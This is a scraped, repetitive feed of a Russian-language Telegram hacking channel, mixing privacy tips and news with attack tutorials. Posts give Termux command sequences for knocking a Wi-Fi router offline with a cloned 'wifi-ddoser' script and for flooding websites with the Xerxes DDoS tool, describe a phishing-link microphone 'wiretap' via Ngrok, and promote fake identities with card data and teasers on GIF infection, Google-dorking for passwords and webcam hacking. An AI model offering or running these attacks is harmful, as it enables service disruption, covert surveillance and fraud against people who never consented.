Что будет с вашими виртуальными аккаунтами, когда вы умрете?
Никто не любит думать о смерти. И уж тем более мало кого заботит, что станет с нашими профилями на различных сайтах, когда мы отправимся в мир иной. Однако подумать об этом стоило бы. Одна из особенностей интернета заключается в том, что он заботливо сохраняет всю информацию, которой мы с ним делимся.
|Читать статью|
Никто не любит думать о смерти. И уж тем более мало кого заботит, что станет с нашими профилями на различных сайтах, когда мы отправимся в мир иной. Однако подумать об этом стоило бы. Одна из особенностей интернета заключается в том, что он заботливо сохраняет всю информацию, которой мы с ним делимся.
|Читать статью|
Telegraph
Что будет с вашими виртуальными аккаунтами, когда вы умрете?
Никто не любит думать о смерти. И уж тем более мало кого заботит, что станет с нашими профилями на различных сайтах, когда мы отправимся в мир иной. Однако подумать об этом стоило бы. Одна из особенностей интернета заключается в том, что он заботливо сохраняет…
This media is not supported in your browser
VIEW IN TELEGRAM
Самая анонимная поисковая система
В интернете нельзя и шагу ступить незамеченным.К примеру,с целью продавать маркетологам информацию о пользователях,поисковики анализируют все наши запросы.Однако существует выход.Вы можете воспользоваться поисковой системой DuckDuckGo,которая,не следит за своими пользователями.Она не хранит лог-файлы и IP-адреса, а также по дефолту не использует куки.Безопасность персональных данных обеспечивается благодаря использованию алгоритма шифрования AES и ключа длиной 128 бит.
В DuckDuckGo практически отсутствует спам,которым забиты все коммерческие поисковики.Cейчас результаты поиска удивляют своей чистотой и точностью.Результаты поиска DuckDuckGo агрегируются из пятидесяти разных источников, включая Wikipedia,Wolfram Alpha и собственного поискового робота,что позволяет поисковику выдавать намного больше результатов поиска.
Одним словом,DuckDuckGo — своеобразная оппозиция Google и всем коммерческим поисковикам в целом,которая просто не могла рано или поздно не появиться.
В интернете нельзя и шагу ступить незамеченным.К примеру,с целью продавать маркетологам информацию о пользователях,поисковики анализируют все наши запросы.Однако существует выход.Вы можете воспользоваться поисковой системой DuckDuckGo,которая,не следит за своими пользователями.Она не хранит лог-файлы и IP-адреса, а также по дефолту не использует куки.Безопасность персональных данных обеспечивается благодаря использованию алгоритма шифрования AES и ключа длиной 128 бит.
В DuckDuckGo практически отсутствует спам,которым забиты все коммерческие поисковики.Cейчас результаты поиска удивляют своей чистотой и точностью.Результаты поиска DuckDuckGo агрегируются из пятидесяти разных источников, включая Wikipedia,Wolfram Alpha и собственного поискового робота,что позволяет поисковику выдавать намного больше результатов поиска.
Одним словом,DuckDuckGo — своеобразная оппозиция Google и всем коммерческим поисковикам в целом,которая просто не могла рано или поздно не появиться.
Самые удивительные трюки в блокноте,которые вы должны попробовать
Можно буквально уничтожить чей-то компьютер с помощью блокнота, а также решить большие проблемы с помощью блокнота. Хорошо, блокнот не делает все, что я сказал сам по себе, но все же. Это платформа, на которой можно написать исходный код, который затем можно скомпилировать и прочее.Я подготовил для вас 15 простых скриптов,которые поднимут вам и вашим друзьям настроение.
|Читать статью|
Можно буквально уничтожить чей-то компьютер с помощью блокнота, а также решить большие проблемы с помощью блокнота. Хорошо, блокнот не делает все, что я сказал сам по себе, но все же. Это платформа, на которой можно написать исходный код, который затем можно скомпилировать и прочее.Я подготовил для вас 15 простых скриптов,которые поднимут вам и вашим друзьям настроение.
|Читать статью|
Telegraph
Самые удивительные трюки в блокноте,которые вы должны попробовать
Можно буквально уничтожить чей-то компьютер с помощью блокнота, а также решить большие проблемы с помощью блокнота. Хорошо, блокнот не делает все, что я сказал сам по себе, но все же. Это платформа, на которой можно написать исходный код, который затем можно…
This media is not supported in your browser
VIEW IN TELEGRAM
Убиваем Wi-FI
Привет ребят,уверен у вас была ситуация,когда нужно было обрубить wi-fi
Данный инструмент поможет нам сделать так,чтобы роутер либо тормозил либо вовсе не раздавал интернет.
Можете протестировать на своем собственном.Чтобы все работало нужно подключиться сначала к wi-fi сети,которую вы хотите ''положить''.
Не злоупотребляйте!
Устанавливаем Termux
Прописываем команды в консоль:
📌pkg upgrade
📌pkg install python python2 git
📌cd
📌git clone https://github.com/artem-cell/wifi-dosser
📌cd wifi-dosser
📌pip2 install requests mechanize
📌ls
📌python2 wifi-ddoser.py
📌python2 wifi-ddoser.py example.com 80 3 999999999999
Если что,после портов в последний строчке-это время в секундах.Указывайте столько,сколько вам нужно чтобы положить роутер.
Если тестируете на своем собственном роутере,то чтобы остановить ddos,просто перезагрузите его.
Привет ребят,уверен у вас была ситуация,когда нужно было обрубить wi-fi
Данный инструмент поможет нам сделать так,чтобы роутер либо тормозил либо вовсе не раздавал интернет.
Можете протестировать на своем собственном.Чтобы все работало нужно подключиться сначала к wi-fi сети,которую вы хотите ''положить''.
Не злоупотребляйте!
Устанавливаем Termux
Прописываем команды в консоль:
📌pkg upgrade
📌pkg install python python2 git
📌cd
📌git clone https://github.com/artem-cell/wifi-dosser
📌cd wifi-dosser
📌pip2 install requests mechanize
📌ls
📌python2 wifi-ddoser.py
📌python2 wifi-ddoser.py example.com 80 3 999999999999
Если что,после портов в последний строчке-это время в секундах.Указывайте столько,сколько вам нужно чтобы положить роутер.
Если тестируете на своем собственном роутере,то чтобы остановить ddos,просто перезагрузите его.
Кто вам сказал,что VPN дает вам анонимность!?
На любом "темном" форуме есть не менее десятка тем с обсуждением VPN сервисов. И что характерно ни в одной из них не обсуждается вопрос - а дают ли VPN какую то анонимность?В этой статье мы постараемся это выяснить.
|Читать статью|
На любом "темном" форуме есть не менее десятка тем с обсуждением VPN сервисов. И что характерно ни в одной из них не обсуждается вопрос - а дают ли VPN какую то анонимность?В этой статье мы постараемся это выяснить.
|Читать статью|
Telegraph
Кто вам сказал,что VPN дает вам анонимность!?
На любом "темном" форуме есть не менее десятка тем с обсуждением VPN сервисов. И что характерно ни в одной из них не обсуждается вопрос - а дают ли VPN какую то анонимность?В этой статье мы постараемся это выяснить. Где есть высказывание эксперта, который…
Я создаю чат канала!
Привет ребят,много кто просил сделать чат,чтобы вы могли общаться и обсуждать посты публикуемые на канале.Но в перую очередь чат создан для того чтобы вы могли помогать друг другу.Я просто не успею всем отвечать или разбирать ваши проблемы.Общайтесь,обсуждайте,помогайте друг другу!
Кстати,возможно с течением времени чат канет в лету.Так что успей добавиться!
Привет ребят,много кто просил сделать чат,чтобы вы могли общаться и обсуждать посты публикуемые на канале.Но в перую очередь чат создан для того чтобы вы могли помогать друг другу.Я просто не успею всем отвечать или разбирать ваши проблемы.Общайтесь,обсуждайте,помогайте друг другу!
Кстати,возможно с течением времени чат канет в лету.Так что успей добавиться!
Заражение компьютера с помощью GIF
Для того, чтобы вирус, полученный каким-либо образом, смог заразить систему, его программный код должен быть исполнен.Сам себя вирус запустить не может, поэтому, например, обычное копирование зараженного файла в незараженную систему еще не приводит к заражению.Сегодня мы поговорим о
заражение компьютера через GIF изображение и получения доступа к нему.
|Читать статью|
Для того, чтобы вирус, полученный каким-либо образом, смог заразить систему, его программный код должен быть исполнен.Сам себя вирус запустить не может, поэтому, например, обычное копирование зараженного файла в незараженную систему еще не приводит к заражению.Сегодня мы поговорим о
заражение компьютера через GIF изображение и получения доступа к нему.
|Читать статью|
Telegraph
Заражение компьютера с помощью GIF
Для того, чтобы вирус, полученный каким-либо образом, смог заразить систему, его программный код должен быть исполнен.Сам себя вирус запустить не может, поэтому, например, обычное копирование зараженного файла в незараженную систему еще не приводит к заражению.Сегодня…
This media is not supported in your browser
VIEW IN TELEGRAM
Cоздаем фейковую личность
Приветствую друзья,думаю многие из вас работали на фриланс биржах или может быть кто-то занимался перепродажей вещей на ebay.
В общем все сталкивались с ситуацией,когда при работе с каким-то сайтом нужно кроме почты,логина и пароля ввести дополнительные данные,а именно:
кредитную карту,место занятости,возможно даже полис,номера отслеживания и тд.Для быстрого создания этих данных нам поможет fakenamegenerator
Буквально несколькими кликами мыши этот ресурс создаст для вас реальную личность,снабдив при этом всеми положенными атрибутами – именем,фамилией, профессией,родственниками,банковской картой,группой крови,машиной и тд.).Кстати,электронный ящик вы получите самый настоящий.Вам лишь останется активировать его. Сделать это можно будет тут же,в FakeNameGenerator.Дополнительно вам будут предоставлены виртуальные день рождения,вес,рост,данные геолокации (место проживания), идентификатор UPS и многие другие сведения.
Приветствую друзья,думаю многие из вас работали на фриланс биржах или может быть кто-то занимался перепродажей вещей на ebay.
В общем все сталкивались с ситуацией,когда при работе с каким-то сайтом нужно кроме почты,логина и пароля ввести дополнительные данные,а именно:
кредитную карту,место занятости,возможно даже полис,номера отслеживания и тд.Для быстрого создания этих данных нам поможет fakenamegenerator
Буквально несколькими кликами мыши этот ресурс создаст для вас реальную личность,снабдив при этом всеми положенными атрибутами – именем,фамилией, профессией,родственниками,банковской картой,группой крови,машиной и тд.).Кстати,электронный ящик вы получите самый настоящий.Вам лишь останется активировать его. Сделать это можно будет тут же,в FakeNameGenerator.Дополнительно вам будут предоставлены виртуальные день рождения,вес,рост,данные геолокации (место проживания), идентификатор UPS и многие другие сведения.
👍1🔥1
Используем малоизвестные функции Google,чтобы найти пароли и скрытые файлы
Получение частных данных не всегда означает взлом — иногда они опубликованы в общем доступе. Знание настроек Google и немного смекалки позволят найти массу интересного — от номеров кредиток до документов ФБР.
|Читать статью|
Получение частных данных не всегда означает взлом — иногда они опубликованы в общем доступе. Знание настроек Google и немного смекалки позволят найти массу интересного — от номеров кредиток до документов ФБР.
|Читать статью|
Telegraph
Используем малоизвестные функции Google,чтобы найти пароли и скрытые файлы
Получение частных данных не всегда означает взлом — иногда они опубликованы в общем доступе. Знание настроек Google и немного смекалки позволят найти массу интересного — от номеров кредиток до документов ФБР. WARNING Вся информация предоставлена исключительно…
This media is not supported in your browser
VIEW IN TELEGRAM
Ставим прослушку на телефон
Привет ребят,сегодня покажу как установить самую легкую прослушку на телефон.Конечно нужно будет применить свои навыки СИ для получения результата.
После проделанных манипуляций вам будет выдана ссылка.После перехода по ней человеку нужно будет дать разрешение на исп. микрофона.Хочу подметить,что вы должны осознавать кому кидаете эту ссылку.Друзьям можно,но не более,тк такие действия наказуемые!
Для генерации ссылки обязательно отключите wifi(юзайте сотовую сеть) и включите точку доступа
Устанавливаем Termux
Прописываем команды в консоль:
Команд чуть больше чем обычно поэтому они тут(клик)
После того как вы ввели все указанные команды у вас открылась "SayHello"
Выбираем в ней Ngrok-02
Спустя пару секунд сгенерируется нужная нам ссылка.Вот и все.
Для прослушки собранных аудио прописываем(клик)
Привет ребят,сегодня покажу как установить самую легкую прослушку на телефон.Конечно нужно будет применить свои навыки СИ для получения результата.
После проделанных манипуляций вам будет выдана ссылка.После перехода по ней человеку нужно будет дать разрешение на исп. микрофона.Хочу подметить,что вы должны осознавать кому кидаете эту ссылку.Друзьям можно,но не более,тк такие действия наказуемые!
Для генерации ссылки обязательно отключите wifi(юзайте сотовую сеть) и включите точку доступа
Устанавливаем Termux
Прописываем команды в консоль:
Команд чуть больше чем обычно поэтому они тут(клик)
После того как вы ввели все указанные команды у вас открылась "SayHello"
Выбираем в ней Ngrok-02
Спустя пару секунд сгенерируется нужная нам ссылка.Вот и все.
Для прослушки собранных аудио прописываем(клик)
❤1
This media is not supported in your browser
VIEW IN TELEGRAM
Узнаем полезность софта
Привет ребят,все мы постоянно обновляем свой арсенал новыми программами и софтом,но многие попросту прочитав обзор на приглянувшийся софт сразу же бегут его скачивать.По сути в этом нет ничего страшного,но я уверен,что вам хотелось бы знать
намного больше информация,вплоть до показателя за действия cpu.
В этом вам поможет shouldiremoveit.Здесь вы увидите полный обзор программы, устанавливаемые к ней файлы,географию распространения,на каких ОС программа скачиваеться,соотношение скачивания и удаления,а также вы можете посмотреть оценку пользователей и много другое.В общем от А до Я.Если вы предпочитаете проводить полный анализ скаченных вами программ или софта,то данный сайт вам точно пригодиться.
Привет ребят,все мы постоянно обновляем свой арсенал новыми программами и софтом,но многие попросту прочитав обзор на приглянувшийся софт сразу же бегут его скачивать.По сути в этом нет ничего страшного,но я уверен,что вам хотелось бы знать
намного больше информация,вплоть до показателя за действия cpu.
В этом вам поможет shouldiremoveit.Здесь вы увидите полный обзор программы, устанавливаемые к ней файлы,географию распространения,на каких ОС программа скачиваеться,соотношение скачивания и удаления,а также вы можете посмотреть оценку пользователей и много другое.В общем от А до Я.Если вы предпочитаете проводить полный анализ скаченных вами программ или софта,то данный сайт вам точно пригодиться.
Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься
Удаленный доступ к веб-камерам и камерам наблюдения — самая наглядная практика взлома. Она не требует спецсофта, позволяя обойтись только браузером и нехитрыми манипуляциями. Тысячи цифровых глаз по всему миру станут доступны, если ты умеешь находить их IP-адреса и уязвимости.
|Читать статью|
Удаленный доступ к веб-камерам и камерам наблюдения — самая наглядная практика взлома. Она не требует спецсофта, позволяя обойтись только браузером и нехитрыми манипуляциями. Тысячи цифровых глаз по всему миру станут доступны, если ты умеешь находить их IP-адреса и уязвимости.
|Читать статью|
Telegraph
Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься
Удаленный доступ к веб-камерам и камерам наблюдения — самая наглядная практика взлома. Она не требует спецсофта, позволяя обойтись только браузером и нехитрыми манипуляциями. Тысячи цифровых глаз по всему миру станут доступны, если ты умеешь находить их IP…
В России поймали международную банду хакеров
ФСБ в сотрудничестве со следственным отделом МВД России нейтрализовала деятельность организованной преступной группировки,специализирующейся на финансовых мошенничествах,кражах и других незаконных операциях в сети.Хакеры занимались продажей украденных данных кредитных карт на специально созданных сайтах.
Для достижения своих целей члены группы создали более 90 интернет-магазинов, продающих полученные данные.Таким образом,хакеры получали информацию,которую затем использовали для кражи средств с банковских счетов граждан разных стран.
Во время обыска в штаб-квартире группы сотрудники обнаружили более миллиона долларов,3 миллиона рублей,компьютерное оборудование,в том числе серверы, обслуживающие нелегальные сайты.Оружие,наркотики,золотые слитки,ценные монеты,а также поддельные документы.На данный момент преступники находятся под стражей и ожидают суда.
ФСБ в сотрудничестве со следственным отделом МВД России нейтрализовала деятельность организованной преступной группировки,специализирующейся на финансовых мошенничествах,кражах и других незаконных операциях в сети.Хакеры занимались продажей украденных данных кредитных карт на специально созданных сайтах.
Для достижения своих целей члены группы создали более 90 интернет-магазинов, продающих полученные данные.Таким образом,хакеры получали информацию,которую затем использовали для кражи средств с банковских счетов граждан разных стран.
Во время обыска в штаб-квартире группы сотрудники обнаружили более миллиона долларов,3 миллиона рублей,компьютерное оборудование,в том числе серверы, обслуживающие нелегальные сайты.Оружие,наркотики,золотые слитки,ценные монеты,а также поддельные документы.На данный момент преступники находятся под стражей и ожидают суда.
This media is not supported in your browser
VIEW IN TELEGRAM
Проводим DDOS атаку на сайт
Привет ребят,в общем хочу показать как устроить атаку на сайт через termux.Конечно вы сами должны понимать,что ddos именно через termux
возможен только для слабеньких сайтов.Также если у вас имеется свой собственный ресурс вы можете проверить,как такая атака отразиться на его работоспособности.Поехали!
Устанавливаем Termux
Прописываем команды в консоль:
📌pkg install update
📌pkg install upgrade
📌pkg install git
соглашаетесь продолжить-Y
📌git clone https://github.com/sepehrdaddev/Xerxes
📌pkg install clang
cоглашаетесь продолжить-Y
📌cd xerxes
📌gcc xerxes.c -o x
📌./x www.(сайт) 80
пишите только url cайта,как пример: ./x www.youtubr.com 80
Все.Запущена отправка пакетов.Для лучшего эффекта запускайте новые сессии и вводите:
📌ls
📌cd xerxes
📌./x www.(cайт) 80
Привет ребят,в общем хочу показать как устроить атаку на сайт через termux.Конечно вы сами должны понимать,что ddos именно через termux
возможен только для слабеньких сайтов.Также если у вас имеется свой собственный ресурс вы можете проверить,как такая атака отразиться на его работоспособности.Поехали!
Устанавливаем Termux
Прописываем команды в консоль:
📌pkg install update
📌pkg install upgrade
📌pkg install git
соглашаетесь продолжить-Y
📌git clone https://github.com/sepehrdaddev/Xerxes
📌pkg install clang
cоглашаетесь продолжить-Y
📌cd xerxes
📌gcc xerxes.c -o x
📌./x www.(сайт) 80
пишите только url cайта,как пример: ./x www.youtubr.com 80
Все.Запущена отправка пакетов.Для лучшего эффекта запускайте новые сессии и вводите:
📌ls
📌cd xerxes
📌./x www.(cайт) 80
Как используя смартфон остаться анонимным?
Хранение личной информации на серверах стало нормой; мир заполнился мобильными девайсами с GPS-приемниками и GSM-модулями, способными рассказать практически все об их владельцах; правительства стран все больше вторгаются в нашу личную жизнь и контролирует каждое наше слово.
|Читать статью|
Хранение личной информации на серверах стало нормой; мир заполнился мобильными девайсами с GPS-приемниками и GSM-модулями, способными рассказать практически все об их владельцах; правительства стран все больше вторгаются в нашу личную жизнь и контролирует каждое наше слово.
|Читать статью|
Telegraph
Как используя смартфон остаться анонимным?
В последние годы отношение к конфиденциальности личной жизни стало куда более серьезным. Хранение личной информации на серверах стало нормой; мир заполнился мобильными девайсами с GPS-приемниками и GSM-модулями, способными рассказать практически все об их…
This media is not supported in your browser
VIEW IN TELEGRAM
Ищем человека по никнейму
Есть люди,которые с самого начала своего пути во всемирной паутине при регистрации различных аккаунтов используют один и тот же никнейм.
Кто-то хочет себя ассоциировать с придуманным интернет именем,а кому-то просто лень придумывать новый никнейм.Если же нужно найти информацию о человеке и вы знаете о его пристрастие к созданию одного и того же ника,то сервис whatsmyname.app поможет вам в этом
Whatsmyname-эффективный и полностью бесплатный инструмент для поиска имени пользователя и домена среди массы проектов в сети Интернет.а также, сервис прекрасно подходит для поиска бизнес-проектов и публичных персон,которым необходимо иметь уникальное наименование в большинстве значимых и популярных сетях и,тем самым,поддерживать свой имидж.
Есть люди,которые с самого начала своего пути во всемирной паутине при регистрации различных аккаунтов используют один и тот же никнейм.
Кто-то хочет себя ассоциировать с придуманным интернет именем,а кому-то просто лень придумывать новый никнейм.Если же нужно найти информацию о человеке и вы знаете о его пристрастие к созданию одного и того же ника,то сервис whatsmyname.app поможет вам в этом
Whatsmyname-эффективный и полностью бесплатный инструмент для поиска имени пользователя и домена среди массы проектов в сети Интернет.а также, сервис прекрасно подходит для поиска бизнес-проектов и публичных персон,которым необходимо иметь уникальное наименование в большинстве значимых и популярных сетях и,тем самым,поддерживать свой имидж.
10 лучших расширений браузеров для хакеров и OSINT-специалистов
Современные браузеры являются надежными инструментами с большими функциональными возможностями, но их можно дополнительно улучшать с помощью расширений. Это позволит нам делать некоторые весьма впечатляющие вещи.
|Читать статью|
Современные браузеры являются надежными инструментами с большими функциональными возможностями, но их можно дополнительно улучшать с помощью расширений. Это позволит нам делать некоторые весьма впечатляющие вещи.
|Читать статью|
Telegraph
10 лучших расширений браузеров для хакеров и OSINT-специалистов
Хакеры и OSINT-специалисты (OSINT (Open Source INTelligence) — поиск, сбор и анализ информации, полученной из общедоступных источников) могут использовать эти инструменты для предотвращения онлайн-трекинга (отслеживания), использования SSH, поиска в Интернете…
5 старых операционок,которые можно попробовать прямо в браузере
Предлагаю этим вечером не просто вспомнить, как выглядели старые операционки и что они умели. Просто запустим их в браузере – «без костылей».Рассказываю, как получить мощную инъекцию ностальгии по Windows 95, познать чудо AmigaOS и ужаснуться «яблочной» Классике. Поехали.
1. Windows 3.1
Весной 1992 года компания Microsoft выпустила Windows 3.1. Система работала на базе MS-DOS и запускалась из командной строки, как обычная «досовская программа». По этой причине есть те, кто не признает Windows 3.1 операционкой, а считает ее просто графической средой к MS-DOS.
2.Windows 95
В Windows 95 впервые появились меню «Пуск» и «Панель задач», которые стали неотъемлемыми компонентами всех последующих версий Windows.
3.System 7
Более известна как «Классика». Выходила с 1991 года для Macintosh на процессорах Motorola 68k, а позже, начиная с версии 7.1.2, добавилась поддержка PowerPC
4.PC-DOS 5
В 1981 году компания Microsoft купила операционную систему 86-DOS. Ее планировалось доработать и использовать на компьютерах IBM PC.
5.AmigaOS 1.3
В 1987 году на полках британских магазинов появился домашний компьютер Commodore Amiga 500. Железо было почти такое же, как и у Macintosh 512Ke — 16-битный процессор Motorola 68000 с тактовой частотой 7,8 МГц и 512 Кб оперативной памяти, которую можно было расширить до 16 Мб.
Предлагаю этим вечером не просто вспомнить, как выглядели старые операционки и что они умели. Просто запустим их в браузере – «без костылей».Рассказываю, как получить мощную инъекцию ностальгии по Windows 95, познать чудо AmigaOS и ужаснуться «яблочной» Классике. Поехали.
1. Windows 3.1
Весной 1992 года компания Microsoft выпустила Windows 3.1. Система работала на базе MS-DOS и запускалась из командной строки, как обычная «досовская программа». По этой причине есть те, кто не признает Windows 3.1 операционкой, а считает ее просто графической средой к MS-DOS.
2.Windows 95
В Windows 95 впервые появились меню «Пуск» и «Панель задач», которые стали неотъемлемыми компонентами всех последующих версий Windows.
3.System 7
Более известна как «Классика». Выходила с 1991 года для Macintosh на процессорах Motorola 68k, а позже, начиная с версии 7.1.2, добавилась поддержка PowerPC
4.PC-DOS 5
В 1981 году компания Microsoft купила операционную систему 86-DOS. Ее планировалось доработать и использовать на компьютерах IBM PC.
5.AmigaOS 1.3
В 1987 году на полках британских магазинов появился домашний компьютер Commodore Amiga 500. Железо было почти такое же, как и у Macintosh 512Ke — 16-битный процессор Motorola 68000 с тактовой частотой 7,8 МГц и 512 Кб оперативной памяти, которую можно было расширить до 16 Мб.
👍1
Все про Wanna Cry.Вирус,который застал людей врасплох
12 мая началась эпидемия трояна-шифровальщика WannaCry — похоже, происходит это по всему миру. Эпидемией мы это называем потому, что очень уж велики масштабы. За один только день мы насчитали более 45 000 случаев атаки, но на самом деле их наверняка намного больше.
|Читать статью|
12 мая началась эпидемия трояна-шифровальщика WannaCry — похоже, происходит это по всему миру. Эпидемией мы это называем потому, что очень уж велики масштабы. За один только день мы насчитали более 45 000 случаев атаки, но на самом деле их наверняка намного больше.
|Читать статью|
Telegraph
Все про Wanna Cry.Вирус,который застал людей врасплох
12 мая началась эпидемия трояна-шифровальщика WannaCry — похоже, происходит это по всему миру. Эпидемией мы это называем потому, что очень уж велики масштабы. За один только день мы насчитали более 45 000 случаев атаки, но на самом деле их наверняка намного больше.…
This media is not supported in your browser
VIEW IN TELEGRAM
Блокируем ПК
Predator — бесплатная программа для блокировки компьютера при помощи USB-флешки в качестве ключа.
Принцип работы программы прост:
— Predator создает ключевой файл на USB-флешке.
— Программа после запуска с определенной периодичностью проверяет наличие этой ключевой флешки и если не обнаруживает ее, то блокирует компьютер — клавиатуру, мышь, экран темнеет.
— Достаточно вставить USB-ключ назад для разблокирования системы.
— Ключ на флешке периодически меняется, делая бессмысленной кражу
копированием ключевого файла.
— Все события, связанные с программой, в том числе попытки взлома, фиксируются в журналах.
— Диспетчер задач (Task Manager) на время блокировки так же отключается, поэтому Ctrl-Alt-Del не действуют.
— В случае утери ключевой флешки контроль можно восстановить при помощи главного пароля, который вводится при первом запуске.
— Предусмотрена звуковая сигнализация при неправильном вводе
главного пароля.
— Predator позволяет защитить одним ключем несколько сетей.
Predator — бесплатная программа для блокировки компьютера при помощи USB-флешки в качестве ключа.
Принцип работы программы прост:
— Predator создает ключевой файл на USB-флешке.
— Программа после запуска с определенной периодичностью проверяет наличие этой ключевой флешки и если не обнаруживает ее, то блокирует компьютер — клавиатуру, мышь, экран темнеет.
— Достаточно вставить USB-ключ назад для разблокирования системы.
— Ключ на флешке периодически меняется, делая бессмысленной кражу
копированием ключевого файла.
— Все события, связанные с программой, в том числе попытки взлома, фиксируются в журналах.
— Диспетчер задач (Task Manager) на время блокировки так же отключается, поэтому Ctrl-Alt-Del не действуют.
— В случае утери ключевой флешки контроль можно восстановить при помощи главного пароля, который вводится при первом запуске.
— Предусмотрена звуковая сигнализация при неправильном вводе
главного пароля.
— Predator позволяет защитить одним ключем несколько сетей.
👍1
This media is not supported in your browser
VIEW IN TELEGRAM
Удавалось ли кому-либо взломать Пентагон?
В фильмах и книгах о хакерах нередко можно встретить словосочетание «взломать Пентагон». Пентагон – это здание Министерства обороны США, которое имеет форму пятиугольника.
Интересный факт: в 2016 году Пентагон разрешил хакерам взломать свои сайты, причем легально и за неплохое вознаграждение. Самое удивительное, что они были взломаны, причем многократно.
Министерство организовало состязание взломщиков не для развлечения, а преследовал взаимовыгодные корыстные цели. Организовав конкурс с призовым фондом в $150 тысяч, пентагон смог выявить уязвимости в своей системе безопасности. За успешный взлом хакерам давали до $15 тысяч.
В состязании участвовали 1410 хакеров. 250 из них сумели обнаружить 1189 уязвимостей, 138 из которых были критическими.
Обнаруженные дыры в безопасности были устранены.
В фильмах и книгах о хакерах нередко можно встретить словосочетание «взломать Пентагон». Пентагон – это здание Министерства обороны США, которое имеет форму пятиугольника.
Интересный факт: в 2016 году Пентагон разрешил хакерам взломать свои сайты, причем легально и за неплохое вознаграждение. Самое удивительное, что они были взломаны, причем многократно.
Министерство организовало состязание взломщиков не для развлечения, а преследовал взаимовыгодные корыстные цели. Организовав конкурс с призовым фондом в $150 тысяч, пентагон смог выявить уязвимости в своей системе безопасности. За успешный взлом хакерам давали до $15 тысяч.
В состязании участвовали 1410 хакеров. 250 из них сумели обнаружить 1189 уязвимостей, 138 из которых были критическими.
Обнаруженные дыры в безопасности были устранены.